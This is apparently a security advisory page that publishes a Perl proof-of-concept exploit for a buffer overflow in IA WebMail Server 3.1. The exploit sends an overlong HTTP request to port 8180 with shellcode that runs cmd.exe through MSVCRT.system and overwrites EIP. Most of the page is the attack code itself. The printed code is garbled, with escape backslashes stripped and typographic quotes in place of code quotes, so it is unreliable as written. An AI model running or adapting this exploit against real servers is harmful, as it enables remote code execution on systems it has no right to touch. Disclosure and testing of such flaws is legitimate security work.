‘IA WebMail Server Buffer Overflow Exploit’

Summary

‘As we reported in our previous article IA WebMail Server Buffer Overflow Vulnerability, a vulnerability in IA WebMail allows remote attackers to overflow an internal buffer, overwriting the EIP address. The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by SecurITeam Experts.’


Details

Vulnerable systems:
 * IA WebMail version 3.1

Exploit:
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die ‘usage: $0 host …’ }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => ‘tcp’,
                                 PeerAddr => $host,
                                 PeerPort => ‘8180’,
                                 );
unless ($remote) { die ‘cannot connect to http daemon on $host’ }

$remote->autoflush(1);

$shellcode = join (”,
‘x90’, # – NOP
‘xCC’, # – INT3
‘x90’, # – NOP
‘x90’, # – NOP
‘x90’, # – NOP
‘x90’, # – NOP
‘x8BxEC’, # – MOV EBP, ESP
‘x55’, # – PUSH EBP
‘x8BxEC’, # – MOV EBP, ESP
‘x33xFF’, # – XOR EDI, EDI
‘x57’, # – PUSH EDI
‘x83xECx04’, # 0 SUB ESP, 4
‘xC6x45xF8x63’, # – MOV BYTE PTR SS:[EBP-8],63h
‘xC6x45xF9x6D’, # – MOV BYTE PTR SS:[EBP-7],6Dh
‘xC6x45xFAx64’, # – MOV BYTE PTR SS:[EBP-6],64h
‘xC6x45xFBx2E’, # – MOV BYTE PTR SS:[EBP-5],2Eh
‘xC6x45xFCx65’, # – MOV BYTE PTR SS:[EBP-4],65h
‘xC6x45xFDx78’, # – MOV BYTE PTR SS:[EBP-3],78h
‘xC6x45xFEx65’, # – MOV BYTE PTR SS:[EBP-2],65h
‘xB8xC3xAFx01x78’, # – MOV EAX, MSVCRT.system
‘x50’, # – PUSH EAX
‘x8Dx45xF8’, # – LEA EAX, DWORD PTR SS:[EBP-8]
‘x50’, # – PUSH EAX
‘xFFx55xF4’, # – CALL DWORD PTR SS:[EBP-C]
‘x5F’ # – POP EDI
);

$eip = ‘x4cxf8x12’;

#0012f84C

#$eip = ‘AAAA’;
$request = join (”, ‘GET /’, $shellcode, ‘A’x(1040-length($shellcode)), $eip, ‘ HTTP/1.1r
Host: $hostr
Connection: closer
r
rn’);

print $remote $request;
sleep(1);

close $remote;’

Categories: Exploits